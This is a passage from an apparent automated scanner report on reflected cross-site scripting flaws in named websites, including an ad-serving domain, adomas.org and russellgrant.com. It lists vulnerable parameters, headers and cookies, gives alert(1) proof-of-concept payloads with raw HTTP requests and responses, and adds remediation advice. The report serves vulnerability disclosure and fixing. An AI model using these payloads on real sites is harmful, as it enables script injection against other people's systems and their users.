Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.186. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eafc8'%3balert(1)//d51e789b63c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eafc8';alert(1)//d51e789b63c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd6e'-alert(1)-'ffbf5d29f3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ab7'-alert(1)-'0c818bb51b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97560'%3balert(1)//13ee165c502 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 97560';alert(1)//13ee165c502 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.190. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8bec'%3balert(1)//b4371b6b088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8bec';alert(1)//b4371b6b088 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b46e'-alert(1)-'4a2054d239f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b969'-alert(1)-'7fd789453ef was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c7'%3balert(1)//069506a5e91 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as ea3c7';alert(1)//069506a5e91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:58:45 GMT
Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ea3c7';alert(1)//069506a5e91http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.194. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 545d8'%3balert(1)//bf962870449 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 545d8';alert(1)//bf962870449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecb0'-alert(1)-'a7842f1522e was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1e3d'-alert(1)-'9b801991a87 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:41:03 GMT
Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... tamp%5d%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Ba1e3d'-alert(1)-'9b801991a87%3B4021250%3Bclickvars="> ...[SNIP]...
2.197. http://www.meetic-partners.com/diff/58/645868/show23.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.meetic-partners.com
Path: /diff/58/645868/show23.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4699e'-alert(1)-'aa0e0877ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a38"><script>alert(1)</script>5c3bbcef668 was submitted in the pid parameter. This input was echoed as 86a38\"><script>alert(1)</script>5c3bbcef668 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /register.php?pid=2186a38"><script>alert(1)</script>5c3bbcef668 HTTP/1.1
Host: www.pageshoppe.me
Proxy-Connection: keep-alive
Referer: http://www.pageshoppe.com/vpn.html?gclid=CJnP9v-9sKoCFcYQNAodzn4A8A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6226'%3balert(1)//20733e1b871 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a6226';alert(1)//20733e1b871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1bff"><script>alert(1)</script>3dd008c56b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ac5"><script>alert(1)</script>7a14d091d7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.russellgrant.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:11:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Last-Modified: Wed, 03 Aug 2011 13:11:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 62295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Psychic Readings, Astrology Predictions and Horoscopes - Russell Grant</title> <meta http- ...[SNIP]... .google-analytics.com/__utm.gif?utmwv=3&utmn=1123795032&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=russellgrant.com&utmhid=1123795032&utmr=http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e&utmp=/nojs_tracker/&utmac=UA-1322086-1&utmcc=__utma%3D55449304.1411259668.1312377083.1312377083.1312377083.2%3B%2B__utmz%3D55449304.1312377083.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_M ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc7e1<script>alert(1)</script>0d14b635a4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:15 GMT
Location: http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 243
Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/">http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed24"><script>alert(1)</script>8ed9d5046df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:13 GMT
Location: http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 247
Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/">http://www.adomas.org/javascript-mouse-wheelbed24"><script>a ...[SNIP]...
2.204. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://adomas.org
Path: /javascript-mouse-wheel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00d8"><script>alert(1)</script>f543c4bfe8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1 HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:05 GMT
Location: http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 253
Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1">http://www.adomas.org/javascript-mouse-wheel/?b00d8"><scr ...[SNIP]...
2.205. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://adomas.org
Path: /javascript-mouse-wheel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 73ea8<script>alert(1)</script>ba887adcdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1 HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:06 GMT
Location: http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 249
Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1">http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1</a> ...[SNIP]...
The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed3a1"><script>alert(1)</script>ab6675584f4 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c36"-alert(1)-"9db60257ee8 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb328'%3b0599b256b6d was submitted in the bdm_unique cookie. This input was echoed as bb328';0599b256b6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="pt-br"> <head> <title>Ecologia para vestir - Mundo Melhor no Bolsa de Mulher | MSN Mulher</titl ...[SNIP]... <script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-717773-15']);
The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf46'%3balert(1)//bedb0aaa228 was submitted in the bdm_unique cookie. This input was echoed as adf46';alert(1)//bedb0aaa228 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Wed, 03 Aug 2011 12:00:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Server: webhead-01
Content-Length: 26567
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="pt-br"> <head> <title>Bolsa de Mulher. O melhor conte..do com a maior rede de amigas da interne ...[SNIP]... <script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-717773-15']);
The value of the lmdinfo cookie is copied into the HTML document as plain text between tags. The payload fa779<a>1b2bafb06a9 was submitted in the lmdinfo cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.